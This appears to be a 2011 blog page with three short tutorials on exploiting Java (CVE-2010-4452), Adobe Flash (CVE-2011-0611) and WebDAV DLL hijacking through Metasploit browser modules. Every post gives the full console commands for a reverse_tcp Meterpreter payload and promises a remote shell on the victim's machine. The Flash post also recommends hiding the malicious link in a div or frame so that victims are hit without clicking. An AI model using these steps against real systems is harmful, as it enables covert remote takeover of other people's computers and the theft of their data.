Saturday, 30 April 2011

JAVA CVE-2010-4452

CVE:  CVE-2010-4452
Remote:  Yes
Local:  No
Published:  Feb 15 2011 12:00AM
Updated:  Apr 19 2011 08:45PM
Description: Oracle Java is prone to a remote code-execution vulnerability in Java Runtime Environment.An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.This vulnerability affects the following supported versions:6 Update 23 and lower.
To exploit you can use the folloing systax on metasploit:
use windows/browser/java_codebase_trust
set SRVPORT 80
set PAYLOAD java/meterpreter/reverse_tcp
set LPORT 8888
Then open up the client browser and open the URL
You should get your shell!
I tested on windows XP and Windows 7, both worked fine, but it didn't worked on ubuntu.

Adobe Flash Player CVE-2011-0611 'SWF' File Remote Memory Corruption Vulnerability

Remote:  Yes
Local:  No
Published:  Apr 11 2011 12:00AM
Updated:  Apr 21 2011 04:14PM
Hello everyone, its beeing a while since my last post, sorry for the delay on the posts but lately I am really busy, but I will try to keep it up. Today I will do 3 posts, the first one is for Adobe Flash and the other is for webdav and the last for java!
So, this adobe exploit is just another one on the wild.. there is so many, I have desided to put the latest one. No big fuss,just prepare the server on metasploit and open the link on the client, so lets do this:
1) msfconsole and then type this ( adjust to your ip address)
use  windows/browser/adobe_flashplayer_flash10o
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 8888
set SRVPORT 80
[*] Exploit running as background job.
[*] Started reverse handler on
[*] Using URL:
[*] Server started.
Now, open this URL in the client and you will get your shell.
sessions -i 1
Bear in mind that this link can be hidden inside a div or a frame, so you can open a malisious link even if you don't click on anything.
And that's it ;)

DLL Hijacking

This vulnerability is triggered when a vulnerable file type is opened from the server that is hosting the files.
Ususally , the user has to browse into the directory and open the file, this can be any file, even blank one with nothing inside.
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory , and then we got our
shell. So lets do this one.

1) open msfconsole
msf> search webdav.dll
msf> use windows/browser/webdav_dll_hijacker
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set BASENAME  reports
msf> set extensions grp
msf> set LHOST
msf> set SRVHOST
msf> set LPORT 8888
msf> set SRVPORT 80
msf> set SHARENAME documents
msf> exploit
Now , go to the client and browse this directory file://192.1681.1.69/ and click on any file
Done, you have your shell
msf> sessions

Now, go to this website to see the list of all apps that are vulnerable